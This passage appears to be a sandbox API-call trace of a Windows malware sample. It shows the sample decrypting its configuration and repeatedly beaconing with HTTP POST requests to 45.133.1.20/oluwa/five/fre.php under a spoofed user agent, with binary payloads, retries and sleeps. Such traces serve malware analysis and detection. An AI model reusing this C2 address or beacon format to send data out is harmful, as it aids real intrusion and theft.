lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0181.833] GetProcessHeap () returned 0x6a0000 [0181.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0181.833] GetProcessHeap () returned 0x6a0000 [0181.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0181.834] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0181.835] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0181.835] GetProcessHeap () returned 0x6a0000 [0181.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0181.835] GetProcessHeap () returned 0x6a0000 [0181.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0181.836] send (s=0x3f4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0181.837] send (s=0x3f4, buf=0x6bb998*, len=159, flags=0) returned 159 [0181.837] GetProcessHeap () returned 0x6a0000 [0181.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0181.837] recv (in: s=0x3f4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0181.912] GetProcessHeap () returned 0x6a0000 [0181.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0181.913] GetProcessHeap () returned 0x6a0000 [0181.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0181.913] GetProcessHeap () returned 0x6a0000 [0181.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0181.913] GetProcessHeap () returned 0x6a0000 [0181.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0181.914] closesocket (s=0x3f4) returned 0 [0181.915] GetProcessHeap () returned 0x6a0000 [0181.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0181.915] GetProcessHeap () returned 0x6a0000 [0181.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0181.915] GetProcessHeap () returned 0x6a0000 [0181.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0181.916] GetProcessHeap () returned 0x6a0000 [0181.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0181.916] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1084) returned 0x3f4 [0181.919] Sleep (dwMilliseconds=0xea60) [0181.920] GetProcessHeap () returned 0x6a0000 [0181.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0181.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.922] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.969] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0181.977] GetProcessHeap () returned 0x6a0000 [0181.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0181.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.978] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0181.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.979] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.981] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.981] GetProcessHeap () returned 0x6a0000 [0181.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0181.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.982] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0181.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.983] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0181.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.987] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0181.988] GetProcessHeap () returned 0x6a0000 [0181.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0181.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.989] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0181.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.989] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0181.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.991] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0181.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.991] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0181.992] GetProcessHeap () returned 0x6a0000 [0181.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0182.002] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.003] GetProcessHeap () returned 0x6a0000 [0182.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0182.003] GetProcessHeap () returned 0x6a0000 [0182.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0182.003] GetProcessHeap () returned 0x6a0000 [0182.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0182.004] GetProcessHeap () returned 0x6a0000 [0182.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0182.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.005] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.011] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0182.017] GetProcessHeap () returned 0x6a0000 [0182.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0182.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.018] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0182.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.019] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.020] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.020] GetProcessHeap () returned 0x6a0000 [0182.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0182.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.022] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0182.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.023] CryptDestroyKey (hKey=0x6ad020) returned 1 [0182.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.024] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0182.024] GetProcessHeap () returned 0x6a0000 [0182.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0182.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.025] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0182.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.026] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0182.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.027] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0182.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.028] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0182.028] GetProcessHeap () returned 0x6a0000 [0182.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0182.028] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf7d8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0182.028] GetProcessHeap () returned 0x6a0000 [0182.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0182.028] socket (af=2, type=1, protocol=6) returned 0x3f8 [0182.029] connect (s=0x3f8, name=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0182.053] FreeAddrInfoW (pAddrInfo=0x6bf7d8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0182.053] GetProcessHeap () returned 0x6a0000 [0182.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0182.053] GetProcessHeap () returned 0x6a0000 [0182.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0182.054] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0182.055] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.055] GetProcessHeap () returned 0x6a0000 [0182.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0182.055] GetProcessHeap () returned 0x6a0000 [0182.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0182.055] GetProcessHeap () returned 0x6a0000 [0182.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0182.056] GetProcessHeap () returned 0x6a0000 [0182.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0182.056] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0182.057] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.057] GetProcessHeap () returned 0x6a0000 [0182.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0182.057] GetProcessHeap () returned 0x6a0000 [0182.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0182.057] send (s=0x3f8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0182.058] send (s=0x3f8, buf=0x6bb998*, len=159, flags=0) returned 159 [0182.058] GetProcessHeap () returned 0x6a0000 [0182.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0182.058] recv (in: s=0x3f8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0182.150] GetProcessHeap () returned 0x6a0000 [0182.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0182.150] GetProcessHeap () returned 0x6a0000 [0182.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0182.151] GetProcessHeap () returned 0x6a0000 [0182.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0182.152] GetProcessHeap () returned 0x6a0000 [0182.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0182.152] closesocket (s=0x3f8) returned 0 [0182.152] GetProcessHeap () returned 0x6a0000 [0182.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0182.153] GetProcessHeap () returned 0x6a0000 [0182.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0182.153] GetProcessHeap () returned 0x6a0000 [0182.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0182.154] GetProcessHeap () returned 0x6a0000 [0182.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0182.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1098) returned 0x3f8 [0182.157] Sleep (dwMilliseconds=0xea60) [0182.158] GetProcessHeap () returned 0x6a0000 [0182.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0182.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.160] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.168] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0182.178] GetProcessHeap () returned 0x6a0000 [0182.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bfaf0 [0182.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.179] CryptImportKey (in: hProv=0x6bed28, pbData=0x6bfaf0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0182.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.181] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.182] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.182] GetProcessHeap () returned 0x6a0000 [0182.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfaf0 | out: hHeap=0x6a0000) returned 1 [0182.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.184] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0182.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.190] CryptDestroyKey (hKey=0x6ad020) returned 1 [0182.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.191] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0182.191] GetProcessHeap () returned 0x6a0000 [0182.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0182.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.193] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0182.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.194] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0182.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.195] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0182.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.196] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0182.197] GetProcessHeap () returned 0x6a0000 [0182.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0182.197] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.197] GetProcessHeap () returned 0x6a0000 [0182.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0182.197] GetProcessHeap () returned 0x6a0000 [0182.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0182.198] GetProcessHeap () returned 0x6a0000 [0182.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0182.199] GetProcessHeap () returned 0x6a0000 [0182.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0182.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.200] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.205] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0182.213] GetProcessHeap () returned 0x6a0000 [0182.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0182.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.214] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0182.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.215] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.216] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.216] GetProcessHeap () returned 0x6a0000 [0182.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0182.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.218] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0182.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.219] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0182.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.221] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0182.221] GetProcessHeap () returned 0x6a0000 [0182.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0182.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.223] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0182.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.225] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0182.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.226] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0182.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.227] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0182.227] GetProcessHeap () returned 0x6a0000 [0182.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0182.227] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf698*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0182.227] GetProcessHeap () returned 0x6a0000 [0182.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0182.228] socket (af=2, type=1, protocol=6) returned 0x3fc [0182.228] connect (s=0x3fc, name=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0182.254] FreeAddrInfoW (pAddrInfo=0x6bf698*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0182.254] GetProcessHeap () returned 0x6a0000 [0182.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0182.254] GetProcessHeap () returned 0x6a0000 [0182.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0182.255] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0182.256] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.256] GetProcessHeap () returned 0x6a0000 [0182.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0182.256] GetProcessHeap () returned 0x6a0000 [0182.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0182.257] GetProcessHeap () returned 0x6a0000 [0182.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0182.257] GetProcessHeap () returned 0x6a0000 [0182.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0182.258] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0182.259] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.259] 